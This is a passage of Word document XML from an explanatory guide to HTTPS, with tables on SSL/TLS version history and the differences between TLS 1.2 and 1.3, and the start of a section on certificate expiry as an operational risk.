              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Too insecure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="3686AEB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CECDB0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>SSL 2.0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B5DFA9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>1995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5220A6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Deprecated 2011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BB5A5F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Many vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="21D4265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E9E298" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>SSL 3.0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A6D6EF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>1996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905004" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Deprecated 2015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5A5DFB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>POODLE attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="16EFFDA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CF0435" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>TLS 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E15F17" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>1999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09B62A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Deprecated 2020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9E6E08" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>BEAST attack susceptible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="7D3AFE3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E2B3DB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>TLS 1.1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1A9747" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>2006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2A338B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Deprecated 2020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08308A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Mostly unused transition version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="5BC0640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367265" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>TLS 1.2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CF6960" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>2008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0A7C29" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Still supported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4A2D7F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Most deployed version currently</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="67A30A5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CA93B1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>TLS 1.3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90F91E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>2018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B1CBA4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Current standard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DE20F4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Faster, simpler, more secure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="74D0229C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"SSL" is technically dead</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> — no SSL version should ever be used. But people colloquially still say "SSL certificate" when they mean "TLS certificate."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCCC2AA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>19.2 TLS 1.2 vs. TLS 1.3 — Key Differences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361"/>
        <w:gridCol w:w="3138"/>
        <w:gridCol w:w="3851"/>
      </w:tblGrid>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="3493380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54E7AD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Aspect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488B52" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TLS 1.2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15C0D3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TLS 1.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="3F3B135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D9CC39" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Handshake RTT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7C7275" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>2 RTT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3FE4D8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>1 RTT (0-RTT on resume)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="09EC38E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623837" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Cipher suites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136BA0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>37+ (many weak)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14A434" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>5 (all strong AEAD)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="4F238B1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4EEF59" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Key exchange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40FA7A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>RSA or ECDHE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D60FA9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>ECDHE only (forward secrecy mandatory)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="0A3505A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9C53F1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Server cert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4D02D2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Sent in plaintext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71E397" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Encrypted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="6878575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25A903" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>0-RTT data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D1A26B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Not supported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50C3E7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Supported (with replay caveat)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="35BD688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BCCB46" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:lastRenderedPageBreak/>
              <w:t>Static RSA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CF2E9F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Allowed (no forward secrecy)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3C5CB5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Removed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="7555374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5F64D9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>RC4, 3DES, CBC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ACAAF3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Allowed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272F7A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Removed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="5B0C964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35B3F2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Renegotiation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452427" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Supported (complex, attack surface)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88D2D2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Removed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="300F6DD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EE39C0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Compression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2A3C50" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Supported (CRIME attack)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58A06E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Removed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="2EDFC8F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F658DA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Downgrade protection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BB8B6C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Weak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E07B1D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Strong (sentinel in ServerHello.random)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5A2CDBB5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TLS 1.3's philosophy:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Remove everything that isn't needed. Fewer options = fewer ways to misconfigure = fewer attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F588E6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="3694808B">
          <v:rect id="_x0000_i3993" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="37918060" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>20. Operational Considerations — Running HTTPS at Scale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F6ABC7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>20.1 Certificate Expiry — The Silent Killer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0928E762" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01415846" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="950"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>You deployed a 1-year certificate 364 days ago.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E41559" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="950"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>It expires tomorrow at midnight.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4313DFB5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="950"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>No one noticed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7A0907" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="950"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>At midnight: ALL users get "Your connection is not private" → effective outage.</w:t>
      </w:r>
    </w:p>
